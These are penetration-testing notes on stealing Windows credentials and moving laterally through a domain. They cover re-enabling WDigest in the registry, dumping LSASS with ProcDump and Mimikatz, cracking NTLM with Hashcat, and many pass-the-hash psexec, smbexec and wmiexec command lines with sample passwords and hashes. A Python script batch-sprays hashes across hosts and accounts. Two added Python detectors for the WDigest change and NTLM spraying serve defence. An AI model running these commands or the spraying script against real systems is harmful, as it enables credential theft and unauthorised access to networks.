Knowledge Point 1:
Windows Server 2012 and later disable WDigest by default, so an attacker cannot read plaintext passwords from memory;
Windows Server 2012 and earlier behave the same way once the KB287199 patch is installed: plaintext passwords can no longer be read from memory;
Solutions:
1. Move laterally by passing the hash (PtH, PtK, etc.)
2. Pass the hash over other service protocols (SMB, WMI, etc.)
3. Modify the registry to turn the WDigest Auth value back on, then obtain the plaintext
4. Crack the hash with tools or third-party platforms (Hashcat)
Knowledge Point 2:
Windows stores password hashes as LM Hash and NTLM Hash; client systems after Windows Vista and server systems after Windows Server 2003 both authenticate with the NTLM Hash.
Registry modification to turn on the WDigest Auth value:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
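Since the registry write above is the move that re-exposes plaintext passwords on a patched host, a defender wants to alert on it. The following is an added detection example (not from the original notes or any tool they list): it checks Sysmon EventID 13 registry records, here constructed sample events, and alerts only when UseLogonCredential is set to 1, ignoring the hardening write of 0; the ControlSetNNN path form that Security event 4657 reports is matched as well.

```python
import re

# Registry value the page's "reg add" command sets. Sysmon reports the hive as
# HKLM\SYSTEM\CurrentControlSet\..., Security event 4657 as \REGISTRY\MACHINE\SYSTEM\ControlSet001\...
WDIGEST_VALUE = re.compile(
    r'^(?:HKLM|\\REGISTRY\\MACHINE)\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})'
    r'\\Control\\SecurityProviders\\WDigest\\UseLogonCredential$',
    re.IGNORECASE,
)

def dword_value(details):
    """Parse Sysmon's rendering of a REG_DWORD, e.g. 'DWORD (0x00000001)'; None if absent."""
    m = re.search(r'0x([0-9a-f]+)', details, re.IGNORECASE)
    return int(m.group(1), 16) if m else None

def check_registry_event(event):
    """Alert on a Sysmon EventID 13 (registry value set) record that turns
    WDigest credential caching on (UseLogonCredential = 1). Returns None otherwise."""
    if event.get('EventID') != 13 or not WDIGEST_VALUE.match(event.get('TargetObject', '')):
        return None
    if dword_value(event.get('Details', '')) != 1:  # 0 is the hardened setting: remediation, not attack
        return None
    return {
        'host': event.get('Computer'),
        'user': event.get('User'),
        'image': event.get('Image'),
        'reason': 'WDigest UseLogonCredential set to 1: LSASS will cache plaintext passwords',
    }

def scan(events):
    """Run the check over a list of event dicts and return the alerts."""
    return [a for a in map(check_registry_event, events) if a]

# Constructed sample records (field names follow Sysmon's event schema; hosts and users are made up)
WDIGEST_KEY = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential'
SAMPLE_EVENTS = [
    {'EventID': 13, 'Computer': 'WS01', 'User': 'CORP\\jdoe',
     'Image': 'C:\\Windows\\System32\\reg.exe', 'TargetObject': WDIGEST_KEY,
     'Details': 'DWORD (0x00000001)'},                       # enabling: alert
    {'EventID': 13, 'Computer': 'WS02', 'User': 'NT AUTHORITY\\SYSTEM',
     'Image': 'C:\\Windows\\System32\\svchost.exe', 'TargetObject': WDIGEST_KEY,
     'Details': 'DWORD (0x00000000)'},                       # hardening to 0: no alert
    {'EventID': 13, 'Computer': 'WS03', 'User': 'CORP\\jdoe',
     'Image': 'C:\\Windows\\System32\\reg.exe',
     'TargetObject': 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL',
     'Details': 'DWORD (0x00000001)'},                       # different value: no alert
]
```

Running `scan(SAMPLE_EVENTS)` yields a single alert for WS01; the same check applied to a real Sysmon feed needs only the four fields used here.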
ProcDump (official Microsoft tool) + Mimikatz to obtain credentials
Advantage: it works around some Windows local policies and account management; once the dump file is obtained, it can be decrypted locally with mimikatz;
In cmd, switch drive and directory: cd /d [target path]
When mimikatz cannot read the passwords directly, use procdump to dump them.
1. Generate a .dmp file containing the stored password hashes
procdump -accepteula -ma
2. Load the .dmp file into mimikatz and run:
privilege::debug
log    (records the console output to a log file)
sekurlsa::minidump
sekurlsa::logonPasswords full
Two other tools for extracting passwords:
Pwdump7
QuarksPwdump
Cracking Windows NTLM hashes with Hashcat
hashcat -a 0 -m 1000 [hash file] [wordlist] --force    (-m 1000 selects NTLM, -a 0 is a dictionary attack)
The tool also supports many other hash types for cracking.
Example hash: 32ed87bdb5fdc5e9cba88547376818d4
Remote execution over the SMB service by passing a plaintext password or a hash; the only requirement is that service port 445 is open;
1. psexec, first method (binary from PsTools): establish an IPC$ connection first; psexec needs either the plaintext password or the hash
An IPC$ connection is needed first; -s runs the command with SYSTEM privileges
net use \\[IP]\ipc$ "[password]" /user:[username]
net use \\192.168.79.132\ipc$ lcn#123456 /user:Administrator    # establish the TCP connection
psexec \\192.168.79.132 -s cmd
2. psexec, second method: no IPC$ connection needed, supply the plaintext account and password directly
psexec \\[IP] -u [username] -p [password] -s cmd
psexec \\192.168.79.132 -u administrator -p lcn#123456 -s cmd
psexec -hashes :[password hash] ./[username]@[IP]
psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df ./[username]@[IP]
psexec -hashes :$HASH$ ./[username]@[IP]
psexec -hashes :[password hash] [domain]/[username]@[IP]
psexec -hashes :$HASH$ [domain]/[username]@[IP]
Failed attempt.
The official PsTools psexec cannot authenticate with a hash; use the impacket toolkit instead, which is easy to use but also easily flagged by antivirus
3. smbexec: no IPC$ connection needed; pass the plaintext password or the hash directly
smbexec [domain]/[username]:[password]@[IP]
smbexec [domain]/administrator:lcn#123456@[IP]
smbexec ./[username]:[password]@[IP]
smbexec ./administrator:lcn#123456@[IP]
smbexec -hashes :[password hash] ./[username]@[IP]
smbexec -hashes :$HASH$ ./[username]@[IP]
smbexec -hashes :[password hash] [domain]/[username]@[IP]
smbexec -hashes :$HASH$ [domain]/[username]@[IP]
smbexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df [domain]/[username]@[IP]
The psexec script from the impacket toolkit works the same way
psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df [domain]/[username]@[IP]
How to tell local users from domain users:
net user : lists local users
net user /domain : lists domain users; the domain name is required when connecting as a domain user;
Domain lateral movement using the WMI service: cscript, wmiexec, wmic
WMI (Windows Management Instrumentation) is exploited over port 135; it supports authentication with a plaintext username and password or with a hash, and this method leaves no trace in the target's logging system.
1. Built-in wmic, plaintext password, no output returned
wmic /node:[IP] /user:[username] /password:[password] process call create "[command]"
wmic /node:192.168.79.130 /user:administrator /password:admin@123 process call create "cmd /c ipconfig >C:\"
(Runs cmd, executes ipconfig and writes the result to the C drive)
2. Built-in cscript, plaintext password, output is returned; the script needs to be downloaded first
cscript //nologo /shell [IP] [username] [password]
cscript //nologo /shell 192.168.79.130 administrator admin@123
A shell is returned
3. impacket wmiexec: plaintext password or hash; output is returned; there is an exe build, which may be flagged by antivirus
wmiexec ./[username]:[password]@[IP] "[command]"
wmiexec ./administrator:lcn#123456@[IP] "whoami"
wmiexec [domain]/[username]:[password]@[IP] "[command]"
wmiexec [domain]/administrator:lcn#123456@[IP] "whoami"
wmiexec -hashes :[password hash] ./[username]@[IP] "[command]"
wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[username]@[IP] "whoami"
wmiexec -hashes :[password hash] [domain]/[username]@[IP] "[command]"
wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 god/[username]@[IP] "whoami"
Batch use of the service hashes above for domain lateral movement: a Python script compiled to an exe
Batch lateral-movement attempts using an exe built from the Python script
Approach to lateral movement inside the intranet:
1. Collect plaintext passwords or hashes with mimikatz; "net user /domain" collects the domain usernames; "for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="" discovers live hosts in the domain
2. Scan in batches and spray the collected passwords
3. Collect more passwords
4. Repeat steps 2 and 3
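Each psexec, smbexec or wmiexec connection made during step 2 is authenticated by the target as an NTLM network logon (LogonType 3) and recorded in its Security log as event 4624 on success or 4625 on failure, so a batch run stands out as many distinct accounts from one source within a short window. The following added example (not part of the original notes) implements that sliding-window check in Python over constructed sample records; the field names follow the Windows event schema, and the IPs, window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log records (not real telemetry), as tuples of
# (TimeCreated, EventID, TargetUserName, IpAddress, LogonType, AuthenticationPackageName).
# 192.168.79.200 plays the host running the batch script; 192.168.79.10 is a normal admin host.
SAMPLE_EVENTS = [
    ('2024-05-01T10:00:01', 4625, 'admin',         '192.168.79.200', 3, 'NTLM'),
    ('2024-05-01T10:00:02', 4625, 'Administrator', '192.168.79.200', 3, 'NTLM'),
    ('2024-05-01T10:00:03', 4625, 'userlu',        '192.168.79.200', 3, 'NTLM'),
    ('2024-05-01T10:00:04', 4625, 'testuser',      '192.168.79.200', 3, 'NTLM'),
    ('2024-05-01T10:00:05', 4624, 'juligan',       '192.168.79.200', 3, 'NTLM'),
    ('2024-05-01T10:05:00', 4624, 'helpdesk',      '192.168.79.10',  3, 'NTLM'),
    ('2024-05-01T11:00:00', 4624, 'helpdesk',      '192.168.79.10',  2, 'Kerberos'),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Flag source IPs that try at least `min_accounts` distinct accounts over
    NTLM network logons (LogonType 3) inside `window`. Both 4624 (success) and
    4625 (failure) count: a pass-the-hash that works is still one of the attempts.
    Returns {source_ip: {'accounts': [...], 'succeeded': [...], 'window_start': ...}}."""
    by_source = defaultdict(list)
    for ts, event_id, user, ip, logon_type, package in events:
        if event_id in (4624, 4625) and logon_type == 3 and package.upper() == 'NTLM':
            by_source[ip].append((datetime.fromisoformat(ts), event_id, user.lower()))
    alerts = {}
    for ip, rows in by_source.items():
        rows.sort()
        # Slide a window forward from each attempt; stop at the first one that trips the threshold.
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            accounts = sorted({r[2] for r in in_window})
            if len(accounts) >= min_accounts:
                alerts[ip] = {
                    'accounts': accounts,
                    'succeeded': sorted({r[2] for r in in_window if r[1] == 4624}),
                    'window_start': start.isoformat(),
                }
                break
    return alerts

if __name__ == '__main__':
    for ip, info in detect_spray(SAMPLE_EVENTS).items():
        print(ip, info)
```

The `succeeded` list is the important output: it names the account whose hash actually worked, which is the one to reset.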
```python
import os
import time

# Target hosts, candidate accounts and NT hashes collected earlier (values from the notes above)
ips = {
    '192.168.79.128',
    '192.168.79.129',
    '192.168.79.130',
    '192.168.79.132'
}
users = {
    'admin',
    'Administrator',
    'administrator',
    'userlu',
    'testuser',
    'juligan'
}
hashs = {
    '579da618cfbfa85247acf1f800a280a4',
    'b7f2f7b2491ba316e8cd773f8c2d58df'
}
'''
# Plaintext variant, not used by the hash loop below
passs = {
    'admin@123', 'admin!123', 'admin#123', 'lcn#123456'}
'''
for ip in ips:
    for user in users:
        for h in hashs:
            # wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[username]@[IP] "whoami"
            cmd = 'wmiexec -hashes :' + h + ' ./' + user + '@' + ip + ' "whoami"'
            print('-->' + cmd + '<--')
            os.system(cmd)
            time.sleep(1)
```
### Resources involved:
Hashcat:/hashcat/hashcat
All-in-one password cracking tool: Hashcat password cracking cheat sheet:/sectool/
mimikatz:/gentilkiwi/mimikatz
impacket:/SecureAuthCorp/impacket
impacket-examples-windows:/RichChigga/impacket-examples-windows
PsTools:/zh-cn/sysinternals/downloads/pstools
ProcDump:/zh-cn/sysinternals/downloads/procdump
K8tools:/realdeveloperongithub/K8tools/blob/master/
K8tools (mirror):/mirrors/K8tools/blob/master/